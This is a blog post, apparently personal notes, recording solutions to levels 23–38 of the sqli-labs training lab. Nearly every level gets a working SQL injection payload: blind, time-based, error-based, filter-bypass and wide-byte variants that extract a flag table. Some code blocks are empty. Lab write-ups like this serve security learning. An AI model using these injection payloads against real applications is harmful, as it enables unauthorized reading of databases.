sqli_labs通关记录(二)
[TOC]
Page-2 (Adv Injections)
less-23
time-based blind:
1 | payload: |
less-24
二次注入
less-25
1 | ``` |
less-25a
boolean-based blind
1 | ?id=1 anandd ascii(mid((select flag from ctftraining.flag),1,1))>103 %23 |
time-based blind
1 | ?id=1 anandd if(length(database())>1,sleep(3),1) %23 |
less-26
报错注入,之前做过的原题,空格过滤用括号代替,or,and双写绕过。
1 | ?id=1'^updatexml(1,concat(0x7e,(select(right(flag,30))from(ctftraining.flag)),0x7e),1)^'1'='1 |
less-26a
Boolean-based blind,过滤情况和26一样
1 | id=1'^ascii(mid((select(flag)from(ctftraining.flag)),1,1))>102^'1'='1 |
less-27
过滤了空格,注释符,union,select 使用大小写绕过
1 | ?id=0'%0aunIon%0aselEct%0a1,database(),3%0aor%0a'1'='1 |
less-27a
1 | ``` |
less-28
Boolean-based blind
1 | ?id=0'||ascii(mid((selECt%0aflag%0afrom%0actftraining.flag),1,1))>102^'1'='0 |
union select
1 | ?id=0%27)%0aunion%0aall%0aselect%0a1,(select%0aflag%0afrom%0actftraining.flag%0a%0alimit%0a0,1),3%0aor%0a(%271%27=%270 |
less-28a
Boolean-based blind
1 | ?id=0'^ ascii(mid((select group_concat(flag) from ctftraining.flag),1,1))>102 or '1'='0 |
less-29
time-based blind
1 | ?id=1%27%20and%20(select(sleep(2-if(ord(mid((select flag from ctftraining.flag),1,1))>102,0,2))))%20and%20%271%27=%271 |
less-30
Boolean-based blind
1 | ?id=1"and ord(mid((select flag from ctftraining.flag),1,1))>101 and "1"="1 |
less-31
1 | ?id=1")and ord(mid((select flag from ctftraining.flag),1,1))>101 and ("1"="1 |
less-32
宽字节注入,
1 | ?id=-1%df%27 union select 1,user(),3 -- + |
less-33
宽字节
1 | ?id=-1%df%27 union select 1,database(),3 -- + |
less-34
宽字节
1 | uname=admin%df' union select 1,(select flag from ctftraining.flag)%23&passwd=123&submit=Submit |
less-35
1 | ?id=-1 union select 1,database(),3 -- + |
less-36
和33一样
less-37
一样
less-38
一样
总结
几十道题都是一样的,没什么营养,掌握几个payload就可以一直用,也学不到什么东西,刷的我好累,休息一阵子再刷后面的吧。
- Post Title: sqli_labs通关记录(二)
- Post Author: Katharsis
- Post Link: http://yoursite.com/2020/08/03/sqli-labs-2/
- Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.